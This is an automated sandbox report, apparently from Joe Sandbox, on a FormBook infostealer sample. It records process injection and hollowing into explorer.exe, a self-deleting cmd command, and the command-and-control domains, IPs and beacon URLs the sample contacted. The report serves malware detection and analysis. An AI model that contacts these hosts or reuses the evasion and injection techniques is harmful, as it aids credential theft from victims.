          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AAC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ABA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ABFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ABFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B38DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B58D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B0A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AA4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A8AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A8C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B03540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AA7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 154.214.84.117 80
          Source: C:\Windows\explorer.exeDomain query: www.intentguild.com
          Source: C:\Windows\explorer.exeDomain query: www.didyouswipe.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.161.84.111 80
          Source: C:\Windows\explorer.exeDomain query: www.uebfaushb.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeMemory written: C:\Users\user\Desktop\GiG35Rwmz6.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: 50000
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess created: C:\Users\user\Desktop\GiG35Rwmz6.exe C:\Users\user\Desktop\GiG35Rwmz6.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\GiG35Rwmz6.exe'
          Source: explorer.exe, 00000005.00000000.708276288.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.708673319.0000000001080000.00000002.00000001.sdmp, help.exe, 00000009.00000002.927110416.0000000004030000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.708673319.0000000001080000.00000002.00000001.sdmp, help.exe, 00000009.00000002.927110416.0000000004030000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.708673319.0000000001080000.00000002.00000001.sdmp, help.exe, 00000009.00000002.927110416.0000000004030000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.708673319.0000000001080000.00000002.00000001.sdmp, help.exe, 00000009.00000002.927110416.0000000004030000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.699012653.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeQueries volume information: C:\Users\user\Desktop\GiG35Rwmz6.exe VolumeInformation
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.0.GiG35Rwmz6.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.GiG35Rwmz6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.GiG35Rwmz6.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.GiG35Rwmz6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.0.GiG35Rwmz6.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.GiG35Rwmz6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.GiG35Rwmz6.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.GiG35Rwmz6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing23Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 432733 Sample: GiG35Rwmz6 Startdate: 10/06/2021 Architecture: WINDOWS Score: 100 31 www.hometheaterplanning.com 2->31 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Antivirus / Scanner detection for submitted sample 2->43 45 7 other signatures 2->45 11 GiG35Rwmz6.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...behaviorgraphiG35Rwmz6.exe.log, ASCII 11->29 dropped 55 Detected unpacking (changes PE section rights) 11->55 57 Detected unpacking (overwrites its own PE header) 11->57 59 Tries to detect virtualization through RDTSC time measurements 11->59 61 Injects a PE file into a foreign processes 11->61 15 GiG35Rwmz6.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 33 www.intentguild.com 104.161.84.111, 49755, 80 IOFLOODUS United States 18->33 35 www.didyouswipe.com 154.214.84.117, 49763, 80 DXTL-HKDXTLTseungKwanOServiceHK Seychelles 18->35 37 www.uebfaushb.com 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 help.exe 18->22         started        signatures11 process12 signatures13 49 Modifies the context of a thread in another process (thread injection) 22->49 51 Maps a DLL or memory area into another process 22->51 53 Tries to detect virtualization through RDTSC time measurements 22->53 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          GiG35Rwmz6.exe40%VirustotalBrowse
          GiG35Rwmz6.exe35%ReversingLabsByteCode-MSIL.Trojan.Taskun
          GiG35Rwmz6.exe100%AviraHEUR/AGEN.1141549
          GiG35Rwmz6.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.0.GiG35Rwmz6.exe.430000.0.unpack100%AviraHEUR/AGEN.1141549Download File
          0.0.GiG35Rwmz6.exe.3c0000.0.unpack100%AviraHEUR/AGEN.1141549Download File
          4.0.GiG35Rwmz6.exe.430000.2.unpack100%AviraHEUR/AGEN.1141549Download File
          0.2.GiG35Rwmz6.exe.3c0000.0.unpack100%AviraHEUR/AGEN.1134873Download File
          4.0.GiG35Rwmz6.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.GiG35Rwmz6.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.GiG35Rwmz6.exe.430000.1.unpack100%AviraHEUR/AGEN.1141549Download File

          Domains

          SourceDetectionScannerLabelLink
          www.intentguild.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.intentguild.com/n8ud/?vPE=5jrT8R0&hL=WvvELDNeXjXNSBNWuUY8Zfoe6Ppc+GsA8iptXd2KegdndXiZdpjCN7GBAWkC1K0OIvRU0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.didyouswipe.com/n8ud/?hL=xx0OFN/A1LQZVCJMLzEbxnX8OnCdv1d2voKBm1sodMz7PL+00tIAVi4krCco92VzLf77&vPE=5jrT8R00%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          www.studiooculto.com/n8ud/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.intentguild.com
          104.161.84.111
          truetrueunknown
          www.didyouswipe.com
          154.214.84.117
          truetrue
            unknown
            www.hometheaterplanning.com
            unknown
            unknowntrue
              unknown
              www.uebfaushb.com
              unknown
              unknowntrue
                unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.intentguild.com/n8ud/?vPE=5jrT8R0&hL=WvvELDNeXjXNSBNWuUY8Zfoe6Ppc+GsA8iptXd2KegdndXiZdpjCN7GBAWkC1K0OIvRUtrue
                • Avira URL Cloud: safe
                unknown
                http://www.didyouswipe.com/n8ud/?hL=xx0OFN/A1LQZVCJMLzEbxnX8OnCdv1d2voKBm1sodMz7PL+00tIAVi4krCco92VzLf77&vPE=5jrT8R0true
                • Avira URL Cloud: safe
                unknown
                www.studiooculto.com/n8ud/true
                • Avira URL Cloud: safe
                low

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                  high
                  http://www.fontbureau.comexplorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                    high
                    http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                      high
                      http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                        high
                        http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                          high
                          http://www.tiro.comexplorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                            high
                            http://www.goodfont.co.krexplorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssGiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpfalse
                              high
                              http://www.carterandcone.comlexplorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.typography.netDexplorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                                high
                                http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://fontfabrik.comexplorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.founder.com.cn/cnexplorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.%s.comPAexplorer.exe, 00000005.00000000.680176172.0000000002B50000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    low
                                    http://www.fonts.comexplorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.sandoll.co.krexplorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameGiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpfalse
                                        high
